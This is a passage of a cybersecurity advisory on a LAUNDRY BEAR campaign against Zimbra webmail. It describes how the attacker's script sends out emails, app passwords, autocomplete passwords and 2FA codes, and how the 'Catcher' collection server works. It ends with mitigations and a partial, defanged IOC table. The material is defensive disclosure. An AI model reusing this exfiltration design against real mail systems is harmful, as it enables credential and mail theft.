      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 7: Structure for information exfiltrated by HTTPS&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;Some of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor-controlled infrastructure. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;#table5&quot;&gt;&lt;strong&gt;Table 5&lt;/strong&gt;&lt;/a&gt; provides a summary of the JSON-based exfiltration.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table5&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 5: HTTPS JSON exfiltration &amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Type of Information&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Exfiltration Stage&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;JSON Key(s)&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;Victim’s Email Address&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;gather_email&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;email&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;Client Type, Version, and Current URL&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;gather_environment&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;client, version, full_url&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;Newly Created Application Password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;gather_app_password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;app_password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;Harvested Autocomplete Password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;gather_autocomplete_password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW25077005 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW25077005 BCX8&quot;&gt;
&lt;p&gt;autocomplete_password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The script transmits all HTTPS exfiltration not identified in &lt;a href=&quot;#table5&quot;&gt;&lt;strong&gt;Table 5&lt;/strong&gt;&lt;/a&gt; using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the “X-Filename” header. Traditionally, developers use headers prefixed with “X-” to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. &lt;a href=&quot;#table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt; summarizes the data exfiltrated in this format.&lt;/p&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;WACAltTextDescribedBy SCXW189907655 BCX8&quot;&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table6&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;&amp;nbsp;Table 6: HTTPS binary exfiltration&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Type of Information&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Exfiltration Stage&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;X-Filename Header&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;SOAP request for GetInfoRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;gather_environment&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;zimbra_batch_analytics.json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;SOAP request for GetScratchCodesRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;gather_2fa_codes&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;zimbra_batch_analytics.json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;SOAP request for GetDeviceStatusRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;gather_device_status&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;zimbra_batch_analytics.json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;SOAP request for GetOAuthConsumersRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;gather_oauth_consumers&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;zimbra_batch_analytics.json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;Victim Organization’s Global Address List&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;gather_gal&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;telemetry_{1-20}.json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;Last 90 Days of Victim’s Emails&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;sendArchives&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW189907655 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW189907655 BCX8&quot;&gt;
&lt;p&gt;telemetryData_{0-89}.json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The script sends all exfiltrated data identified in &lt;a href=&quot;#table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt; to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1560/&quot; target=&quot;_blank&quot;&gt;T1560&lt;/a&gt;]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in &lt;a href=&quot;#table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt; using the application/octet-stream content typing rather than application/json.&lt;/p&gt;
&lt;p&gt;At the beginning and end of the collection and exfiltration activity, during the &lt;em&gt;sendStartPing&lt;/em&gt; and &lt;em&gt;sendFinishPing &lt;/em&gt;stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL documented in &lt;a href=&quot;#figure2&quot;&gt;&lt;strong&gt;Figure 2&lt;/strong&gt;&lt;/a&gt;, using a URL path of “/v/p” and with a “subtype” key that shows which type of action it logged (&lt;em&gt;start, finish, or error&lt;/em&gt;). &amp;nbsp;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Catcher&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;Ulej &lt;/em&gt;exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the &lt;a href=&quot;#resourcedev1&quot;&gt;Resource development&lt;/a&gt; section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.&lt;/p&gt;
&lt;p&gt;Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the &lt;a href=&quot;#resourcedev1&quot;&gt;Resource development&lt;/a&gt; section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let’s Encrypt and forwards all traffic with an SNI containing “*.i.*” to port 8000 within the Catcher container.&lt;/p&gt;
&lt;p&gt;The DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let’s Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;However, if a query includes a domain formatted as shown in &lt;a href=&quot;#figure6&quot;&gt;&lt;strong&gt;Figure 6&lt;/strong&gt;&lt;/a&gt; and &lt;a href=&quot;#figure7&quot;&gt;&lt;strong&gt;Figure 7&lt;/strong&gt;&lt;/a&gt;, the service saves a log file in JSON format to disk containing the following details of the DNS query:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Time of query,&lt;/li&gt;
&lt;li&gt;Source IP address for query,&lt;/li&gt;
&lt;li&gt;Queried domain, and&lt;/li&gt;
&lt;li&gt;Type of query.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The HTTP server typically responds with OK, except in cases where the path is “pixel.gif” when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in &lt;a href=&quot;#figure6&quot;&gt;&lt;strong&gt;Figure 6&lt;/strong&gt;&lt;/a&gt; and &lt;a href=&quot;#figure7&quot;&gt;&lt;strong&gt;Figure 7&lt;/strong&gt;&lt;/a&gt;. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to “application/json”, Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a “.bin” file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Time,&lt;/li&gt;
&lt;li&gt;Source IP address,&lt;/li&gt;
&lt;li&gt;Request method,&lt;/li&gt;
&lt;li&gt;Host,&lt;/li&gt;
&lt;li&gt;Path,&lt;/li&gt;
&lt;li&gt;Query string,&lt;/li&gt;
&lt;li&gt;Headers, and&lt;/li&gt;
&lt;li&gt;Base64 payload.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These JSON event log files and binary output files are then initially saved to the directory &lt;em&gt;/root/hits/tmp&lt;/em&gt; and later moved to the &lt;em&gt;/root/hits/ready&lt;/em&gt; directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non-public-facing infrastructure. The command in &lt;a href=&quot;#figure8&quot;&gt;&lt;strong&gt;Figure 8&lt;/strong&gt;&lt;/a&gt; also executes hourly to remove all files last modified at least two days ago from the &lt;em&gt;/root/hits/ready&lt;/em&gt; directory.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure8&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/Figure%208-Command%20used%20for%20automated%20directory%20cleanup.png?itok=IqvZvbLK&quot; width=&quot;1024&quot; height=&quot;92&quot; alt=&quot;Figure 8: Command used for automated directory cleanup&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 8: Command used for automated directory cleanup&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;h2&gt;&lt;strong&gt;Response strategies&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/em&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;mitigations1&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;In many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.&lt;/p&gt;
&lt;p&gt;All organizations that use the ZCS webmail service should &lt;strong&gt;immediately prioritize&lt;/strong&gt; ensuring that their ZCS is not running a vulnerable version. A patch for &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt; was released for both 10.1.13 and 10.0.18 versions of ZCS [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationHardening&quot;&gt;D3-AH&lt;/a&gt;]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non-vulnerable version [&lt;a href=&quot;https://d3fend.mitre.org/tactic/d3f:Isolate/&quot; target=&quot;_blank&quot;&gt;d3f:Isolate&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:ApplicationHardening&quot; target=&quot;_blank&quot;&gt;D3-AH&lt;/a&gt;]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including &lt;a href=&quot;https://www.cisa.gov/known-exploited-vulnerabilities-catalog&quot;&gt;CISA’s Known Exploited Vulnerabilities Catalog&lt;/a&gt; and &lt;a href=&quot;https://www.ncsc.gov.uk/collection/vulnerability-management/guidance/responding-to-active-exploitation&quot; target=&quot;_blank&quot;&gt;NCSC-UK’s Responding to active exploitation of vulnerabilities&lt;/a&gt; guidance.&lt;/p&gt;
&lt;p&gt;Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:CredentialHardening&quot; target=&quot;_blank&quot;&gt;D3-CH&lt;/a&gt;]. However, Application Passcodes may still be necessary and should be monitored closely. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainLogCollectionStorage3Q&quot;&gt;CPG 3.Q&lt;/a&gt;]. This will allow organizations to monitor for and identify suspicious network activity [&lt;a href=&quot;https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IdentifyAdverseEvents4B&quot;&gt;CPG 4.B&lt;/a&gt;], such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis&quot; target=&quot;_blank&quot;&gt;D3-NTA&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;Frequent DNS queries for a suspicious domain with seemingly random subdomains [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis&quot; target=&quot;_blank&quot;&gt;D3-DNSTA&lt;/a&gt;];&lt;/li&gt;
&lt;li&gt;A sudden spike of connections to a server associated with a recently established domain [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation&quot;&gt;D3-NTCD&lt;/a&gt;]; and &amp;nbsp;&lt;/li&gt;
&lt;li&gt;Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation&quot;&gt;D3-NTCD&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the &lt;a href=&quot;#exfil1&quot;&gt;Exfiltration&lt;/a&gt; section of this advisory.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Indicators of compromise (IOCs)&lt;/strong&gt;&lt;/em&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;ioc1&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;Flowerbed infrastructure&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;The following indicators have been attributed to use by LAUNDRY BEAR for their campaign targeting ZCS’s webmail service as of the publication of this advisory. (&lt;strong&gt;Disclaimer: &lt;/strong&gt;Due to the frequency of operational structure changes by this group, these indicators are intended solely for historic attribution purposes. Some indicators, such as IPs, compromised emails, and domains, may be outdated, so organizations should check for current activity before acting on these IOCs.) &lt;a href=&quot;#table7&quot;&gt;&lt;strong&gt;Table 7&lt;/strong&gt;&lt;/a&gt; provides details about the server infrastructure used to host Flowerbed, and &lt;a href=&quot;#table8&quot;&gt;&lt;strong&gt;Table 8&lt;/strong&gt;&lt;/a&gt; lists the corresponding SHA-1 hash values for the Let’s Encrypt certificates used by that infrastructure [&lt;a href=&quot;https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis&quot; target=&quot;_blank&quot;&gt;D3-IAA&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table7&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 7: Flowerbed server infrastructure&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Domain&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;IP Address&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;First Seen&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Last Seen&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;zmailanalytics[.]com&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW193774983 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW193774983 BCX8&quot;&gt;
&lt;p&gt;216.252.238[.]104&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
